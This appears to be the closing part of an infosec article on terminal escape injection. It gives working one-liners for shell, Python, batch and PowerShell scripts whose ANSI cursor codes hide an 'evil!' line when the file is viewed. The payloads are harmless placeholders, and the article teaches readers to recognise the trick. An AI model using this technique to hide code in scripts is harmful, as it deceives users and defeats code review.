Shell script escape injection
echo -e '#!/bin/sh\n\necho "evil!"\nexit 0\n\033[2Aecho "Hello World!"\n' > script.sh
chmod a+x script.shThe resulting script.sh will then work on (has been tested on):
Linux (gnome-terminal, xterm, aterm)
Mac OS (Terminal 2.0, iTerm2)
Cygwin (Windows)Python script escape injection
echo -e '#!/usr/bin/python\n\nprint "evil!";\nexit(0);\n#\033[2A\033[1Dprint "Hello World!";\n' > script.py
chmod a+x script.pyThe resulting script.py will then work on (has been tested on):
Linux (gnome-terminal, xterm, aterm)
Mac OS (Terminal 2.0, iTerm2)
Cygwin (Windows)Batch (Command Prompt) escape injection
echo -e '@echo off\n\r\n\recho evil!\r\n::\033[2D \033[A\033[2Decho Hello World!' > script.batThe resulting script.bat will then work on (has been tested on):
Windows 10 PowerShell
Windows 10 Command PromptPS1 (PowerShell) escape injection
echo -e 'write-host "evil!"\r\n#\033[A\033[2Dwrite-host "Hello World!"' > script.ps1The resulting script.ps1 will then work on (has been tested on):
Windows 10 PowerShell
Windows 10 Command PromptConclusion
As we have seen in this article, terminal escape injections affect practically every modern operating system environment and they can be really nasty.
As infosec professionals, we should know about them and keep our guards up when it matters. Hopefully this article provided enough information to stay safe.
Please feel free to let us know in the comment section your thoughts.